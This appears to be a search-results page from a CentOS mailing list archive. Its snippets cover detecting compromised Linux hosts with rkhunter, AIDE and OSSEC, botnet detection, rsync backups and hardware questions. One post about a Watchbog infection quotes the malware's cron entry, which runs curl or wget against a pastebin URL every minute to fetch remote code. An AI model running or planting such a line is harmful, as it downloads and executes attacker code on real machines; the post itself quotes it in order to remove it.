Displaying 20 results from an estimated 3000 matches similar to: "how to know when a system is compromised"
2019 Nov 14
2
how to know when a system is compromised
I have not, I'll look into that one, thanks!
On 11/14/2019 9:48 AM, SternData wrote:
> Do you run rkhunter?
>
> On 11/14/19 9:40 AM, Christopher Wensink wrote:
>> How do you know when a Linux system has been compromised??
>>
>> Every day I watch our systems with all the typical tools, ps, top, who,
>> I watch firewall / IPS logs, I have logwatch setup and
2019 Nov 14
0
how to know when a system is compromised
This is one where there's probably no limit to what you could do. We have a high-security environment and are using Aide and OSSEC.
Aide has been good at reporting file system changes and is very granular, the dilemma is what to monitor and what to ignore (keep from being inundated with reports of innocuous changes at the risk of missing something). However, it is not daemon-based so
2019 Nov 14
2
how to know when a system is compromised
Once upon a time, Leroy Tennison <leroy at datavoiceint.com> said:
> The executable could be placed on mounted read-only media
That's not as secure as you think. Linux bind mounts can mount a file
over another file (plus there's overlay filesystems), so it's possible
to replace a binary even on a read-only device.
--
Chris Adams <linux at cmadams.net>
2017 Nov 06
1
How to detect botnet user on the server ?
Another alternative is to use a FIMS/HIDS such as Aide (Advanced Intrusion Detection Environment), OSSEC or Samhain. Be prepared to learn a lot about what your OS normally does behind the scenes (and thus a fair amount of initial fine tuning to exclude those things). Aide seems to work well (I've seen only one odd result) and is quite granular. However, it is local system based rather than
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget
2019 Nov 14
0
how to know when a system is compromised
On 2019-11-14 10:01, Christopher Wensink wrote:
> I have not, I'll look into that one, thanks!
>
> On 11/14/2019 9:48 AM, SternData wrote:
>> Do you run rkhunter?
>>
>> On 11/14/19 9:40 AM, Christopher Wensink wrote:
>>> How do you know when a Linux system has been compromised?
I'm sure you have followed the procedure how to install system and
2019 Nov 14
0
how to know when a system is compromised
Do you run rkhunter?
On 11/14/19 9:40 AM, Christopher Wensink wrote:
> How do you know when a Linux system has been compromised??
>
> Every day I watch our systems with all the typical tools, ps, top, who,
> I watch firewall / IPS logs, I have logwatch setup and mailing daily
> summaries to me and I dive deeper into logs if something looks suspicious.
>
> What am I missing
2020 Jul 01
4
[OT] Bacula offsite replication
Hi Leroy,
How I can confirm that during rsync transfer corruption are not encountered?
Thank you in advance.
Il 01/07/20 16:04, Leroy Tennison ha scritto:
> I've used rsync (but probably not for the size you're referring to), it works and has enough features to meet most needs. I have had a single situation where corruption occurred during transfer (a few times, have no idea why),
2017 Nov 06
2
How to detect botnet user on the server ?
Hello guys,
Whats is the best way to identify a possible user using a botnet with php
in the server? And if he is using GET commands for example in other server.
Does apache logs outbound conections ?
If it is using a file that is not malicious the clam av would not identify.
Thanks
2019 Oct 12
1
easy way to stop old ssl's
Without context it's impossible to make firm statements but, having gone through this a while back (and discovering that less than 1 percent of an examined list of connections couldn't support current ssl - mainly Apple hardware), who do you want to protect? Is it the minority who won't/can't upgrade or the majority who have? And, do you have to protect yourself from liability
2020 Jul 08
6
USB-serial adapter for CentOS 7
I need to connect an older APS UPS unit to a machine running CentOS 7. Unfortunately the UPS only has a serial port whereas the computer does not. I am aware that there are USB-serial adapters but that the hardware or the drivers might fall short of expectations.
Does anyone have positive experience with such an adapter? Or, conversely, would recommend avoid a particular adapter?
2020 Jul 01
2
[OT] Bacula offsite replication
Hi everyone,
I have updated my backup server to CentOS 8.2. It runs bacula performing
backup on disks. I would like to replicate backups on another offsite
machine.
I read about the ability to configure a new storage daemon in the
offsite location and create a Migration/Copy Jobs. If I'm not wrong, it
replicates only volumes but not replicate the catalog. I will try this.
Another way to
2019 Nov 04
3
Limit user password by time
Is it possible with "chage" to configure a password caducity for, at
most, 2 hours? I think "chage" only allows caducity for, at least, one day.
2020 Jul 08
3
USB-serial adapter for CentOS 7
On 2020-07-08 10:23, Leroy Tennison wrote:
> I've used one on a Linux laptop, it "just worked" but the OS wasn't CentOS 7.
>
It is not clear if you used USB from APC UPS to USB port on the machine
side or USB - to - "serial". USB to USB with standard USB cable will work.
If one uses serial to USB adapter on the machine side (to create serial
port through USB
2020 Jun 27
2
HP vs. Brother Printers: Use with Centos/Fedora
On Sat, 2020-06-27 at 15:44 -0600, Frank Cox wrote:
> On Sat, 27 Jun 2020 17:33:39 -0400
> Jay Hart wrote:
>
> >
> > If you had to rate which printer brand works better with Linux
> > (Fedora and
> > Centos), what would it be?
> Any Brother printer that I've ever had the misfortune to have to deal
> with either didn't work at all or if could be made
2020 Jul 02
5
[OT] Bacula offsite replication
Il 01/07/20 17:13, Leroy Tennison ha scritto:
> I realize this shouldn't happen, the file is a tgz and isn't being modified while being transmitted. This has happened maybe three times this year and unfortunately I've just had to deal with it rather than invest the time to do the research.
>
>
> Harriscomputer
>
> Leroy Tennison
> Network Information/Cyber
2020 Mar 25
4
Need help to fix bug in rsync
> On Wed, 2020-03-25 at 14:39 +0000, Leroy Tennison wrote:
>> Since you state that using -z is almost always a bad idea, could you
>> provide the rationale for that? I must be missing something.
>>
> I think the "rationale" is that at some point the
> compression/decompression takes longer than the time reduction from
> sending a compressed file. It
2019 May 23
2
Bash completion thrown by quoted option args?
There was a thread about C7 bash completion back in August last year, but it doesn't have answers for this problem.
Example: "yum install /path/to/local/package" works fine with tab completion to fill in the path and package bits.
However, "yum --debuglevel="1" install ..." just gets stuck and doesn't offer anything. The only option is to type everything
2020 Apr 02
2
CentOS 7 host with guests as bridge cannot access host
This is unfortunate.
https://wiki.libvirt.org/page/TroubleshootMacvtapHostFail
To the "normal" user - BRIDGE means guest is on the same network and has
access to the host.
Bummer.
Jerry
2020 Apr 02
2
Upgraded to 7.10 from 6...
Let me start out by making clear I *LOATHE* gnome, ok? So I don't want
to hear about it.
What's happening is this: I did this:
yum groupinstall "Development and Creative Workstation"
yum groupinstall "KDE Plasma Workspaces"
Now, when I go in graphical mode, I try to change to kde on login. Nope
- minutes later, I can see a cursor, and a gray screen. Ditto on the